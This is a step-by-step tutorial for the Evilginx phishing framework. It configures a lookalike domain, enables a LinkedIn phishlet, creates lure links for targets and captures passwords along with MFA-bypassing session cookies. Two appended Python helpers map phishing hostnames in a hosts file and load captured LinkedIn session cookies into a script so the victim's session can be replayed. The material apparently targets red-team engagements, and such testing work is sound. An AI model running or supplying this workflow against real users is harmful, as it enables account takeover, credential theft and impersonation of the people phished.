Learn how to configure Evilginx and set up your first phishing campaign.
Start Evilginx and Evilpuppet following the deployment guide for your type of installation.
Set up a domain
When you start Evilginx for the first time you will see warning messages about server domain and server ipv4 not being set. This is the first thing you need to configure. As an example, we'll use the following domain and IP address:
: config domain not-a-phish.com
: config ipv4 220.127.116.11
If you're setting up a local development instance, you can pick whatever domain you want, but make sure to set ipv4 to a local IPv4 network address, the same address you will later map the phishing hostnames to in your hosts file.
Set up a phishlet
Now you can start enabling phishlets. You can list all of your available phishlets by typing phishlets. Whenever you need help or want to see the list of available commands, type help. When you need more information about a specific command, type help <command> with the name of that command.
Don't forget to use the Tab key: the Evilginx command prompt fully supports auto-completion, which makes it more convenient to use.
For this example we'll set up a LinkedIn phishlet to demonstrate how to set up your first engagement.
Set up a hostname for your LinkedIn phishing URL. You can pick whatever hostname you want, with as many subdomains as you want, on the condition that it ends with the domain you set up with config domain.
Here's an example:
: phishlets hostname linkedin totally.legit.linkedin.not-a-phish.com
The last step is to enable the phishlet.
: phishlets enable linkedin
Now, if you're not running a local development instance (started with the -developer command line argument), Evilginx will automatically start obtaining the required TLS certificates from Let's Encrypt.
If your firewall rules for inbound TCP port 443 and UDP port 53 are set up correctly, Evilginx should be able to obtain the certificates and your phishlet should now be ready to use. If certificate retrieval fails, confirm that your domain's nameserver records point at the Evilginx server and that both ports are reachable from the internet before sending out any links.
If you're running Evilginx in developer mode in your local deployment, you will have to manually modify your hosts file (C:\Windows\System32\drivers\etc\hosts on Windows) to map the phishing hostnames to your local IP address.
To make it easier, Evilginx can generate the list of host entries for you, which you can copy-paste into your hosts file:
: phishlets get-hosts linkedin
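The developer-mode hosts step above, as an added example that is not part of the Evilginx documentation or code: a Python helper that merges the "IP hostname" lines printed by phishlets get-hosts into a hosts file between marker comments, so re-running it after you change the hostname or the ipv4 setting replaces the old entries instead of leaving stale ones that resolve to the wrong address. The get-hosts output layout, the marker comments and the sample hosts-file content are assumptions of this example. Run it with administrator or root rights against C:\Windows\System32\drivers\etc\hosts on Windows or /etc/hosts on Linux and macOS.

```python
"""Merge `phishlets get-hosts` output into a hosts file without leaving stale entries."""
import re
from pathlib import Path

# Marker comments delimit the block this script owns, so a re-run replaces it.
BEGIN_MARK = "# BEGIN evilginx developer hosts"
END_MARK = "# END evilginx developer hosts"

# Constructed sample of `phishlets get-hosts linkedin` output in developer mode:
# one "IP hostname" line per phishing host (layout assumed for this example).
SAMPLE_GET_HOSTS = """\
127.0.0.1 totally.legit.linkedin.not-a-phish.com
127.0.0.1 www.totally.legit.linkedin.not-a-phish.com
127.0.0.1 static.totally.legit.linkedin.not-a-phish.com
"""

# Constructed hosts-file content to merge into.
SAMPLE_HOSTS = """\
# Copyright (c) 1993-2009 Microsoft Corp.
127.0.0.1 localhost
10.0.0.5 build-server
"""

# "<ip> <one or more hostnames> [# comment]"; comment-only lines never match.
HOST_LINE = re.compile(r"^\s*([0-9a-fA-F.:]+)\s+([^#]+?)\s*(?:#.*)?$")


def parse_host_lines(text):
    """Return (ip, hostname) pairs from hosts-style text, ignoring comments and blanks."""
    pairs = []
    for line in text.splitlines():
        m = HOST_LINE.match(line)
        if m:
            for host in m.group(2).split():
                pairs.append((m.group(1), host.lower()))
    return pairs


def merge_hosts(existing, get_hosts_output):
    """Return hosts-file text with the Evilginx block replaced (or appended)."""
    lines = existing.splitlines()
    # 1. Remove the block from a previous run, markers included.
    if BEGIN_MARK in lines and END_MARK in lines:
        b, e = lines.index(BEGIN_MARK), lines.index(END_MARK)
        del lines[b:e + 1]
    # 2. Drop unmarked lines for the same hostnames so each name has exactly one answer.
    pairs = parse_host_lines(get_hosts_output)
    wanted = {host for _, host in pairs}
    lines = [l for l in lines if not any(h in wanted for _, h in parse_host_lines(l))]
    # 3. Trim trailing blank lines and append the fresh block.
    while lines and not lines[-1].strip():
        lines.pop()
    block = [BEGIN_MARK] + [f"{ip} {host}" for ip, host in pairs] + [END_MARK]
    return "\n".join(lines + block) + "\n"


def resolved_locally(hosts_text, hostname):
    """IP the hosts text maps `hostname` to, or None; check this before opening a lure."""
    for ip, host in parse_host_lines(hosts_text):
        if host == hostname.lower():
            return ip
    return None


def update_hosts_file(path, get_hosts_output):
    """Rewrite the real hosts file in place (requires administrator/root rights)."""
    path = Path(path)
    path.write_text(merge_hosts(path.read_text(), get_hosts_output))


if __name__ == "__main__":
    print(merge_hosts(SAMPLE_HOSTS, SAMPLE_GET_HOSTS), end="")
```

Paste the terminal output of phishlets get-hosts into update_hosts_file(); the markers let you remove everything again with a single delete of the block once the engagement is over.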
Set up a lure
With the phishlet up and running, you can now create a lure, which will become a phishing link you send out to users in order to lure them to your phishing page.
Create a lure for the linkedin phishlet:
: lures create linkedin
Your first lure will now be created with a random URL path. You can list all created lures with the lures command.
Grab the URL of your first lure (we assume the ID of the lure is 0):
: lures get-url 0
You can now copy the URL and paste it into your web browser. If you're testing locally, make sure to delete all cookies in your web browser every time before opening your phishing links.
Capture a session
Enter the credentials for your own account and go through the multi-factor authentication process as a test run.
When Evilginx successfully captures the credentials together with the authentication cookies for the session, you will see the following message in the terminal window:
all authorization tokens intercepted!
List all captured sessions with the sessions command and pick the session of interest by specifying its ID (we assume the ID of the session is 0):
: sessions 0
You will see all the details of the captured session, including the captured password, the victim's IP address and user-agent.
At the bottom you will see the session cookies, which you can import into your own browser to impersonate the captured session. You can find out more about this in the guide dedicated to sessions.
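The session cookies mentioned above, as an added example that is not part of the Evilginx documentation or code: Evilginx prints the captured tokens as a JSON array in the layout browser cookie-import extensions use (assumed here: path, domain, expirationDate, value, name, httpOnly, hostOnly per entry). This Python helper loads such an export into the standard library's http.cookiejar so the session can be replayed from a script instead of a browser, refuses to send the cookies over plain http, and reports which ones have already expired. The export layout and the sample cookie values are assumptions of this example, not a real capture.

```python
"""Load an Evilginx session-cookie export into a stdlib cookie jar for scripted replay."""
import json
import time
import urllib.request
from http.cookiejar import Cookie, CookieJar

# Constructed sample of a captured session's cookies in the JSON array layout
# Evilginx prints (layout and values are assumptions for this example).
SAMPLE_EXPORT = """[
  {"path": "/", "domain": ".www.linkedin.com", "expirationDate": 2147483647,
   "value": "AQEDAREDACTEDREDACTED", "name": "li_at", "httpOnly": true, "hostOnly": false},
  {"path": "/", "domain": ".www.linkedin.com", "expirationDate": 2147483647,
   "value": "ajax:1234567890123456789", "name": "JSESSIONID", "httpOnly": false, "hostOnly": false}
]"""


def load_evilginx_cookies(export_json):
    """Turn the exported JSON array into a CookieJar, one Cookie per entry."""
    jar = CookieJar()
    for c in json.loads(export_json):
        domain = c["domain"]
        # expirationDate is a Unix timestamp; 0 or missing means a session cookie.
        expires = int(c.get("expirationDate") or 0) or None
        jar.set_cookie(Cookie(
            version=0, name=c["name"], value=c["value"],
            port=None, port_specified=False,
            domain=domain,
            domain_specified=not c.get("hostOnly", False),
            domain_initial_dot=domain.startswith("."),
            path=c.get("path", "/"), path_specified=True,
            # Captured over TLS; flag Secure so the jar never sends them over http.
            secure=True,
            expires=expires, discard=expires is None,
            comment=None, comment_url=None,
            rest={"HttpOnly": None} if c.get("httpOnly") else {},
        ))
    return jar


def cookie_header_for(jar, url):
    """The Cookie header the jar would attach to a request for `url` ('' if none apply)."""
    req = urllib.request.Request(url)
    jar.add_cookie_header(req)
    return req.get_header("Cookie", "")


def expired_names(jar, now=None):
    """Names of cookies already expired at `now` (epoch seconds); check before replaying."""
    now = int(time.time()) if now is None else now
    return sorted(c.name for c in jar if c.is_expired(now))


def build_opener(jar):
    """urllib opener that sends the captured session with every request."""
    return urllib.request.build_opener(urllib.request.HTTPCookieProcessor(jar))


if __name__ == "__main__":
    jar = load_evilginx_cookies(SAMPLE_EXPORT)
    print(cookie_header_for(jar, "https://www.linkedin.com/feed/"))
    # Replay: build_opener(jar).open("https://www.linkedin.com/feed/")
```

Marking every imported cookie Secure is deliberate: a captured token that travels over an unencrypted connection during replay would expose the session to a second interceptor, so the jar simply does not attach it to http URLs. Check expired_names() first; an expired token should be discarded rather than replayed.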
This concludes the tutorial. If you want to learn more, follow the guides on more specific features.